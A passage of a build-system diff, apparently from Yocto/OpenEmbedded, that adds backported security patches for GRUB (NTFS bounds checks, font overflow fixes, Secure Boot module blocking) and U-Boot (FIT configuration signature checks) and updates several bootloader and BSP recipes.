+obfuscated passwords from BS EFI variables.
+
+This fix implements a check to ensure that resident data is read from the
+corresponding file record segment only.
+
+Fixes: CVE-2023-4693
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
+CVE: CVE-2023-4693
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index c8d3683..4d1fe42 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
+ {
+ if (ofs + len > u32at (pa, 0x10))
+ return grub_error (GRUB_ERR_BAD_FS, "read out of range");
+- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
++
++ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
++
++ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ if (u16at (pa, 0x14) + u32at (pa, 0x10) >
++ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
+ return 0;
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/determinism.patch b/meta/recipes-bsp/grub/files/determinism.patch
new file mode 100644
index 0000000000..bd4e7188ec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/determinism.patch
@@ -0,0 +1,56 @@
+The output in moddep.lst generated from syminfo.lst using genmoddep.awk is
+not deterministic since the order of the dependencies on each line can vary
+depending on how awk sorts the values in the array.
+
+Be deterministic in the output by sorting the dependencies on each line.
+
+Also, the output of the SOURCES lines in grub-core/Makefile.core.am, generated
+from grub-core/Makefile.core.def with gentpl.py is not deterministic due to
+missing sorting of the list used to generate it. Add such a sort.
+
+Also ensure the generated unidata.c file is deterministic by sorting the
+keys of the dict.
+
+Upstream-Status: Submitted [https://lists.gnu.org/archive/html/grub-devel/2023-06/index.html]
+Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: grub-2.04/grub-core/genmoddep.awk
+===================================================================
+--- grub-2.04.orig/grub-core/genmoddep.awk
++++ grub-2.04/grub-core/genmoddep.awk
+@@ -59,7 +59,9 @@ END {
+ }
+ modlist = ""
+ depcount[mod] = 0
+- for (depmod in uniqmods) {
++ n = asorti(uniqmods, w)
++ for (i = 1; i <= n; i++) {
++ depmod = w[i]
+ modlist = modlist " " depmod;
+ inverse_dependencies[depmod] = inverse_dependencies[depmod] " " mod
+ depcount[mod]++
+Index: grub-2.04/gentpl.py
+===================================================================
+--- grub-2.04.orig/gentpl.py
++++ grub-2.04/gentpl.py
+@@ -568,6 +568,7 @@ def foreach_platform_value(defn, platfor
+ for group in RMAP[platform]:
+ for value in defn.find_all(group + suffix):
+ r.append(closure(value))
++ r.sort()
+ return ''.join(r)
+
+ def platform_conditional(platform, closure):
+Index: grub-2.04/util/import_unicode.py
+===================================================================
+--- grub-2.04.orig/util/import_unicode.py
++++ grub-2.04/util/import_unicode.py
+@@ -174,7 +174,7 @@ infile.close ()
+
+ outfile.write ("struct grub_unicode_arabic_shape grub_unicode_arabic_shapes[] = {\n ")
+
+-for x in arabicsubst:
++for x in sorted(arabicsubst):
+ try:
+ if arabicsubst[x]['join'] == "DUAL":
+ outfile.write ("{0x%x, 0x%x, 0x%x, 0x%x, 0x%x},\n " % (arabicsubst[x][0], arabicsubst[x][1], arabicsubst[x][2], arabicsubst[x][3], arabicsubst[x][4]))
diff --git a/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
new file mode 100644
index 0000000000..d4ba3cafc5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
@@ -0,0 +1,117 @@
+From 1f511ae054fe42dce7aedfbfe0f234fa1e0a7a3e Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 00:51:20 +0800
+Subject: [PATCH] font: Fix size overflow in grub_font_get_glyph_internal()
+
+The length of memory allocation and file read may overflow. This patch
+fixes the problem by using safemath macros.
+
+There is a lot of code repetition like "(x * y + 7) / 8". It is unsafe
+if overflow happens. This patch introduces grub_video_bitmap_calc_1bpp_bufsz().
+It is safe replacement for such code. It has safemath-like prototype.
+
+This patch also introduces grub_cast(value, pointer), it casts value to
+typeof(*pointer) then store the value to *pointer. It returns true when
+overflow occurs or false if there is no overflow. The semantics of arguments
+and return value are designed to be consistent with other safemath macros.
+
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c76ec09ae08155df27cd237eaea150b4f02f532]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 17 +++++++++++++----
+ include/grub/bitmap.h | 18 ++++++++++++++++++
+ include/grub/safemath.h | 2 ++
+ 3 files changed, 33 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index 5edb477..df17dba 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -733,7 +733,8 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ grub_int16_t xoff;
+ grub_int16_t yoff;
+ grub_int16_t dwidth;
+- int len;
++ grub_ssize_t len;
++ grub_size_t sz;
+
+ if (index_entry->glyph)
+ /* Return cached glyph. */
+@@ -760,9 +761,17 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ return 0;
+ }
+
+- len = (width * height + 7) / 8;
+- glyph = grub_malloc (sizeof (struct grub_font_glyph) + len);
+- if (!glyph)
++ /* Calculate real struct size of current glyph. */
++ if (grub_video_bitmap_calc_1bpp_bufsz (width, height, &len) ||
++ grub_add (sizeof (struct grub_font_glyph), len, &sz))
++ {
++ remove_font (font);
++ return 0;
++ }
++
++ /* Allocate and initialize the glyph struct. */
++ glyph = grub_malloc (sz);
++ if (glyph == NULL)
+ {
+ remove_font (font);
+ return 0;
+diff --git a/include/grub/bitmap.h b/include/grub/bitmap.h
+index 5728f8c..0d9603f 100644
+--- a/include/grub/bitmap.h
++++ b/include/grub/bitmap.h
+@@ -23,6 +23,7 @@
+ #include <grub/symbol.h>
+ #include <grub/types.h>
+ #include <grub/video.h>
++#include <grub/safemath.h>
+
+ struct grub_video_bitmap
+ {
+@@ -79,6 +80,23 @@ grub_video_bitmap_get_height (struct grub_video_bitmap *bitmap)
+ return bitmap->mode_info.height;
+ }
+
++/*
++ * Calculate and store the size of data buffer of 1bit bitmap in result.
++ * Equivalent to "*result = (width * height + 7) / 8" if no overflow occurs.
++ * Return true when overflow occurs or false if there is no overflow.
++ * This function is intentionally implemented as a macro instead of
++ * an inline function. Although a bit awkward, it preserves data types for
++ * safemath macros and reduces macro side effects as much as possible.
++ *
++ * XXX: Will report false overflow if width * height > UINT64_MAX.
++ */
++#define grub_video_bitmap_calc_1bpp_bufsz(width, height, result) \
++({ \
++ grub_uint64_t _bitmap_pixels; \
++ grub_mul ((width), (height), &_bitmap_pixels) ? 1 : \
++ grub_cast (_bitmap_pixels / GRUB_CHAR_BIT + !!(_bitmap_pixels % GRUB_CHAR_BIT), (result)); \
++})
++
+ void EXPORT_FUNC (grub_video_bitmap_get_mode_info) (struct grub_video_bitmap *bitmap,
+ struct grub_video_mode_info *mode_info);
+
+diff --git a/include/grub/safemath.h b/include/grub/safemath.h
+index c17b89b..bb0f826 100644
+--- a/include/grub/safemath.h
++++ b/include/grub/safemath.h
+@@ -30,6 +30,8 @@
+ #define grub_sub(a, b, res) __builtin_sub_overflow(a, b, res)
+ #define grub_mul(a, b, res) __builtin_mul_overflow(a, b, res)
+
++#define grub_cast(a, res) grub_add ((a), 0, (res))
++
+ #else
+ #error gcc 5.1 or newer or clang 3.8 or newer is required
+ #endif
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
new file mode 100644
index 0000000000..504352b4e3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
@@ -0,0 +1,107 @@
+From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001
+From: Matthew Garrett <mjg@redhat.com>
+Date: Mon, 13 Jan 2014 12:13:09 +0000
+Subject: Don't permit loading modules on UEFI secure boot
+
+Author: Colin Watson <cjwatson@ubuntu.com>
+Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch
+Forwarded: no
+Last-Update: 2013-12-25
+
+Patch-Name: no-insmod-on-sb.patch
+
+Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch]
+
+Backport of a Debian (and Fedora) patch implementing a way to get secure boot status
+for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport.
+Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch
+
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/dl.c | 13 +++++++++++++
+ grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++
+ include/grub/efi/efi.h | 1 +
+ 3 files changed, 42 insertions(+)
+
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..074dfc3c6 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -38,6 +38,10 @@
+ #define GRUB_MODULES_MACHINE_READONLY
+ #endif
+
++#ifdef GRUB_MACHINE_EFI
++#include <grub/efi/efi.h>
++#endif
++
+
+
+ #pragma GCC diagnostic ignored "-Wcast-align"
+@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename)
+ void *core = 0;
+ grub_dl_t mod = 0;
+
++#ifdef GRUB_MACHINE_EFI
++ if (grub_efi_secure_boot ())
++ {
++ grub_error (GRUB_ERR_ACCESS_DENIED,
++ "Secure Boot forbids loading module from %s", filename);
++ return 0;
++ }
++#endif
++
+ grub_boot_time ("Loading module %s", filename);
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE);
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6e1ceb905..96204e39b 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid,
+ return NULL;
+ }
+
++grub_efi_boolean_t
++grub_efi_secure_boot (void)
++{
++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_size_t datasize;
++ char *secure_boot = NULL;
++ char *setup_mode = NULL;
++ grub_efi_boolean_t ret = 0;
++
++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !secure_boot)
++ goto out;
++
++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !setup_mode)
++ goto out;
++
++ if (*secure_boot && !*setup_mode)
++ ret = 1;
++
++ out:
++ grub_free (secure_boot);
++ grub_free (setup_mode);
++ return ret;
++}
++
+ #pragma GCC diagnostic ignored "-Wcast-align"
+
+ /* Search the mods section from the PE32/PE32+ image. This code uses
+diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h
+index e90e00dc4..a237952b3 100644
+--- a/include/grub/efi/efi.h
++++ b/include/grub/efi/efi.h
+@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var,
+ const grub_efi_guid_t *guid,
+ void *data,
+ grub_size_t datasize);
++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void);
+ int
+ EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1,
+ const grub_efi_device_path_t *dp2);
diff --git a/meta/recipes-bsp/grub/grub2.inc b/meta/recipes-bsp/grub/grub2.inc
index 4ec7d0b0fc..bea03f4fc1 100644
--- a/meta/recipes-bsp/grub/grub2.inc
+++ b/meta/recipes-bsp/grub/grub2.inc
@@ -13,6 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
CVE_PRODUCT = "grub2"
+# Applies only to RHEL
+CVE_CHECK_WHITELIST += "CVE-2019-14865"
+# Applies only to SUSE
+CVE_CHECK_WHITELIST += "CVE-2021-46705"
+
SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \
file://autogen.sh-exclude-pc.patch \
@@ -27,7 +32,86 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
file://script-Remove-unused-fields-from-grub_script_functio.patch \
file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \
file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \
-"
+ file://determinism.patch \
+ file://no-insmod-on-sb.patch \
+ file://CVE-2020-14372_1.patch \
+ file://CVE-2020-14372_2.patch \
+ file://CVE-2020-14372_3.patch \
+ file://CVE-2020-14372_4.patch \
+ file://CVE-2020-14372_5.patch \
+ file://CVE-2020-14372.patch \
+ file://CVE-2020-27779.patch \
+ file://CVE-2020-27779_2.patch \
+ file://CVE-2020-27779_3.patch \
+ file://CVE-2020-27779_4.patch \
+ file://CVE-2020-27779_5.patch \
+ file://CVE-2020-27779_6.patch \
+ file://CVE-2020-27779_7.patch \
+ file://CVE-2020-25632.patch \
+ file://CVE-2020-25647.patch \
+ file://0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch \
+ file://0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch \
+ file://0003-net-tftp-Fix-dangling-memory-pointer.patch \
+ file://0004-kern-parser-Fix-resource-leak-if-argc-0.patch \
+ file://0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch \
+ file://0006-kern-efi-Fix-memory-leak-on-failure.patch \
+ file://0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch \
+ file://0008-gnulib-regexec-Resolve-unused-variable.patch \
+ file://0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch \
+ file://0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch \
+ file://0011-gnulib-regexec-Fix-possible-null-dereference.patch \
+ file://0012-gnulib-regcomp-Fix-uninitialized-re_token.patch \
+ file://0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch \
+ file://0014-zstd-Initialize-seq_t-structure-fully.patch \
+ file://0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch \
+ file://0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch \
+ file://0017-disk-ldm-If-failed-then-free-vg-variable-too.patch \
+ file://0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch \
+ file://0019-disk-cryptodisk-Fix-potential-integer-overflow.patch \
+ file://0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch \
+ file://0021-zfs-Fix-possible-negative-shift-operation.patch \
+ file://0022-zfs-Fix-resource-leaks-while-constructing-path.patch \
+ file://0023-zfs-Fix-possible-integer-overflows.patch \
+ file://0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch \
+ file://0025-affs-Fix-memory-leaks.patch \
+ file://0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch \
+ file://0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch \
+ file://0028-syslinux-Fix-memory-leak-while-parsing.patch \
+ file://0029-normal-completion-Fix-leaking-of-memory-when-process.patch \
+ file://0030-commands-hashsum-Fix-a-memory-leak.patch \
+ file://0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch \
+ file://0032-video-fb-fbfill-Fix-potential-integer-overflow.patch \
+ file://0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch \
+ file://0034-video-fb-video_fb-Fix-possible-integer-overflow.patch \
+ file://0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch \
+ file://0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch \
+ file://0037-loader-bsd-Check-for-NULL-arg-up-front.patch \
+ file://0038-loader-xnu-Fix-memory-leak.patch \
+ file://0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch \
+ file://0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch \
+ file://0041-util-grub-install-Fix-NULL-pointer-dereferences.patch \
+ file://0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch \
+ file://0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch \
+ file://0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch \
+ file://0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch \
+ file://0046-script-execute-Avoid-crash-when-using-outside-a-func.patch \
+ file://CVE-2021-3981.patch \
+ file://CVE-2021-3695.patch \
+ file://CVE-2021-3696.patch \
+ file://CVE-2021-3697.patch \
+ file://CVE-2022-28733.patch \
+ file://CVE-2022-28734.patch \
+ file://CVE-2022-28736.patch \
+ file://CVE-2022-28735.patch \
+ file://font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch \
+ file://CVE-2022-2601.patch \
+ file://CVE-2022-3775.patch \
+ file://CVE-2020-27749.patch \
+ file://CVE-2021-20225.patch \
+ file://CVE-2021-20233.patch \
+ file://CVE-2023-4692.patch \
+ file://CVE-2023-4693.patch \
+ "
SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934"
SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea"
@@ -46,6 +130,8 @@ GRUBPLATFORM ??= "pc"
inherit autotools gettext texinfo pkgconfig
+CFLAGS_remove = "-O2"
+
EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \
--disable-grub-mkfont \
--program-prefix="" \
diff --git a/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
new file mode 100644
index 0000000000..47c7ec4170
--- /dev/null
+++ b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
@@ -0,0 +1,36 @@
+From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Wed, 11 Nov 2020 22:58:55 -0800
+Subject: [PATCH] Fix cross compilation using autoconf detected AR
+
+currently its using 'ar' program from build host, which is not expected,
+we need to respect AR passed in environment
+
+Upstream-Status: Pending
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ configure.in | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/configure.in b/configure.in
+index 4ddbe8b..b7c3c31 100644
+--- a/configure.in
++++ b/configure.in
+@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog,
+ ])
+
+ dnl Checks for programs.
++m4_ifndef([AC_PROG_AR],[dnl
++ AN_MAKEVAR([AR], [AC_PROG_AR])
++ AN_PROGRAM([ar], [AC_PROG_AR])
++ AC_DEFUN([AC_PROG_AR],
++ [AC_CHECK_TOOL(AR, ar, :)])
++])
++AC_PROG_AR
+ AC_PROG_CC
+ AC_PROG_GCC_TRADITIONAL
+ dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE
+--
+2.29.2
+
diff --git a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
index 4129237c59..54c431eeb3 100644
--- a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
+++ b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
@@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \
file://lrzsz-check-locale.h.patch \
file://cve-2018-10195.patch \
file://include.patch \
+ file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \
"
SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4"
diff --git a/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
index 56f2d4b915..972d8de17d 100644
--- a/meta/recipes-bsp/opensbi/opensbi_0.6.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
@@ -1,5 +1,6 @@
SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)"
DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration."
+HOMEPAGE = "https://github.com/riscv/opensbi"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5"
@@ -8,7 +9,7 @@ require opensbi-payloads.inc
inherit autotools-brokensep deploy
SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862"
-SRC_URI = "git://github.com/riscv/opensbi.git \
+SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
"
diff --git a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
index cac09101c4..fa3b993788 100644
--- a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
+++ b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
@@ -19,9 +19,12 @@ PACKAGECONFIG[manpages] = "--enable-doc, --disable-doc, libxslt-native xmlto-nat
RDEPENDS_${PN} = "grep bash"
+EXTRA_OECONF = "--libdir=${nonarch_libdir}"
+
do_configure_prepend () {
( cd ${S}; autoreconf -f -i -s )
}
-FILES_${PN} += "${libdir}/${BPN}/*"
+FILES_${PN} += "${nonarch_libdir}/${BPN}/*"
FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging"
+FILES_${PN}-dev += "${nonarch_libdir}/pkgconfig/pm-utils.pc"
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
new file mode 100644
index 0000000000..d784452b44
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch
@@ -0,0 +1,98 @@
+From 67acad3db71bb372458fbb8a77749f5eb88aa324 Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:01 -0600
+Subject: [PATCH] image: Check hash-nodes when checking configurations
+
+It is currently possible to use a different configuration's signature and
+thus bypass the configuration check. Make sure that the configuration node
+that was hashed matches the one being checked, to catch this problem.
+
+Also add a proper function comment to fit_config_check_sig() and make it
+static.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/67acad3db71bb372458fbb8a77749f5eb88aa324]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/image-sig.c | 36 +++++++++++++++++++++++++++++++++---
+ 1 file changed, 33 insertions(+), 3 deletions(-)
+
+diff --git a/common/image-sig.c b/common/image-sig.c
+index 13ccd50bc5..03143a4040 100644
+--- a/common/image-sig.c
++++ b/common/image-sig.c
+@@ -359,20 +359,39 @@ int fit_image_verify_required_sigs(const void *fit, int image_noffset,
+ return 0;
+ }
+
+-int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+- char **err_msgp)
++/**
++ * fit_config_check_sig() - Check the signature of a config
++ *
++ * @fit: FIT to check
++ * @noffset: Offset of configuration node (e.g. /configurations/conf-1)
++ * @required_keynode: Offset in the control FDT of the required key node,
++ * if any. If this is given, then the configuration wil not
++ * pass verification unless that key is used. If this is
++ * -1 then any signature will do.
++ * @conf_noffset: Offset of the configuration subnode being checked (e.g.
++ * /configurations/conf-1/kernel)
++ * @err_msgp: In the event of an error, this will be pointed to a
++ * help error string to display to the user.
++ * @return 0 if all verified ok, <0 on error
++ */
++static int fit_config_check_sig(const void *fit, int noffset,
++ int required_keynode, int conf_noffset,
++ char **err_msgp)
+ {
+ char * const exc_prop[] = {"data"};
+ const char *prop, *end, *name;
+ struct image_sign_info info;
+ const uint32_t *strings;
++ const char *config_name;
+ uint8_t *fit_value;
+ int fit_value_len;
++ bool found_config;
+ int max_regions;
+ int i, prop_len;
+ char path[200];
+ int count;
+
++ config_name = fit_get_name(fit, conf_noffset, NULL);
+ debug("%s: fdt=%p, conf='%s', sig='%s'\n", __func__, gd_fdt_blob(),
+ fit_get_name(fit, noffset, NULL),
+ fit_get_name(gd_fdt_blob(), required_keynode, NULL));
+@@ -413,9 +432,20 @@ int fit_config_check_sig(const void *fit, int noffset, int required_keynode,
+ char *node_inc[count];
+
+ debug("Hash nodes (%d):\n", count);
++ found_config = false;
+ for (name = prop, i = 0; name < end; name += strlen(name) + 1, i++) {
+ debug(" '%s'\n", name);
+ node_inc[i] = (char *)name;
++ if (!strncmp(FIT_CONFS_PATH, name, strlen(FIT_CONFS_PATH)) &&
++ name[sizeof(FIT_CONFS_PATH) - 1] == '/' &&
++ !strcmp(name + sizeof(FIT_CONFS_PATH), config_name)) {
++ debug(" (found config node %s)", config_name);
++ found_config = true;
++ }
++ }
++ if (!found_config) {
++ *err_msgp = "Selected config not in hashed nodes";
++ return -1;
+ }
+
+ /*
+@@ -483,7 +513,7 @@ static int fit_config_verify_sig(const void *fit, int conf_noffset,
+ if (!strncmp(name, FIT_SIG_NODENAME,
+ strlen(FIT_SIG_NODENAME))) {
+ ret = fit_config_check_sig(fit, noffset, sig_offset,
+- &err_msg);
++ conf_noffset, &err_msg);
+ if (ret) {
+ puts("- ");
+ } else {
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
new file mode 100644
index 0000000000..023f7eac0a
--- /dev/null
+++ b/meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch
@@ -0,0 +1,52 @@
+From 8a9d03732e6d0f68107c80919096e7cf956dcb3d Mon Sep 17 00:00:00 2001
+From: Simon Glass <sjg@chromium.org>
+Date: Wed, 18 Mar 2020 11:44:02 -0600
+Subject: [PATCH] image: Load the correct configuration in fit_check_sign
+
+At present bootm_host_load_images() is passed the configuration that has
+been verified, but ignores it and just uses the default configuration.
+This may not be the same.
+
+Update this function to use the selected configuration.
+
+Signed-off-by: Simon Glass <sjg@chromium.org>
+
+CVE: CVE-2020-10648
+Upstream-Status: Backport[https://github.com/u-boot/u-boot/commit/8a9d03732e6d0f68107c80919096e7cf956dcb3d]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ common/bootm.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/common/bootm.c b/common/bootm.c
+index 902c13880d..db4362a643 100644
+--- a/common/bootm.c
++++ b/common/bootm.c
+@@ -819,7 +819,8 @@ void __weak switch_to_non_secure_mode(void)
+ #else /* USE_HOSTCC */
+
+ #if defined(CONFIG_FIT_SIGNATURE)
+-static int bootm_host_load_image(const void *fit, int req_image_type)
++static int bootm_host_load_image(const void *fit, int req_image_type,
++ int cfg_noffset)
+ {
+ const char *fit_uname_config = NULL;
+ ulong data, len;
+@@ -831,6 +832,7 @@ static int bootm_host_load_image(const void *fit, int req_image_type)
+ void *load_buf;
+ int ret;
+
++ fit_uname_config = fdt_get_name(fit, cfg_noffset, NULL);
+ memset(&images, '\0', sizeof(images));
+ images.verify = 1;
+ noffset = fit_image_load(&images, (ulong)fit,
+@@ -878,7 +880,7 @@ int bootm_host_load_images(const void *fit, int cfg_noffset)
+ for (i = 0; i < ARRAY_SIZE(image_types); i++) {
+ int ret;
+
+- ret = bootm_host_load_image(fit, image_types[i]);
++ ret = bootm_host_load_image(fit, image_types[i], cfg_noffset);
+ if (!err && ret && ret != -ENOENT)
+ err = ret;
+ }
diff --git a/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch b/meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch
new file mode 100644
index 0000000000..b0a16efeaa
--- /dev/null
